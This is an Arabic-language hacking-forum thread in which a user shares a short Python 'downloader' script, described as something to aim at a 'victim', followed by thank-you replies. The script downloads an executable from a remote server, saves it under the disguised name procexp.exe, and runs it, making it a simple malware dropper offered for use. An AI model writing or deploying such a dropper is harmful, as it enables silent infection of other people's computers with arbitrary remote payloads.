حالة الموضوع:
مغلق
  1. or0

    or0 V • I • P

    الأنتساب:
    ‏22 فبراير 2014
    المشاركات:
    392
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    18
    [​IMG]

    الحمد لله وحده نحمده و نشكره و نستعينه و نستغفره و نعود بالله من شرور أنفسنا و من سيئات أعمالنا
    من يهده الله فلا مضل له و من يضلل فلن تجد له ولياً مرشدا
    .و أشهد ألا إله إلا الله وحده لا شريك له و أن
    محمداً عبده و رسوله صلى الله عليه و سلم ...
    و على آله و صحبه أجمعين و من تبعهم بإحسان إلى يوم الدين أما بعد...

    [​IMG]


    كيف حال أخواني في منتدى عراق تيم

    اليوم معنا دون لود بسيط مبرمج بلغة العصر
    python


    سكريبت سهل التعامل معه
    كل معليك هو وضع ربط السرفر المباشر
    و مسار نزول له عند الضحية




    كود

    [HTML CODE]



    #!/usr/bin/python






    import os,sys,time


    import urllib


    import string


    import subprocess






    url = 'http://www.site.com/1.exe'


    filename = 'C:/procexp.exe'


    urllib.urlretrieve(url, filename)


    time.sleep(4)


    subprocess.call(["C:/procexp.exe"])[/HTML CODE]


    الاهداء :

    للجميع بدون إستثناء



    [​IMG]
     
  2. Dr-Ahmed

    Dr-Ahmed Developer

    الأنتساب:
    ‏12 مارس 2015
    المشاركات:
    18
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: كود لغة بايثون | كود للدونلود

    بارك الله بيك اخي الفاضل

     
  3. ȤōŘϴ

    ȤōŘϴ DeveloPer Plus

    الأنتساب:
    ‏24 أكتوبر 2014
    المشاركات:
    303
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    18
    المخالفات
    3
    رد: كود لغة بايثون | كود للدونلود

    عاشت ايدك [​IMG]

    جاري التجربة :{13}:
     
  4. KaDiM aL-iRaQi

    KaDiM aL-iRaQi ExpertDeveloper ExpErt DeveloPer

    الأنتساب:
    ‏2 سبتمبر 2014
    المشاركات:
    680
    الإعجابات المتلقاة:
    23
    نقاط الجائزة:
    18
    رد: كود لغة بايثون | كود للدونلود

    جزآكـَ آلله خيرَ يآغآلي ​
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة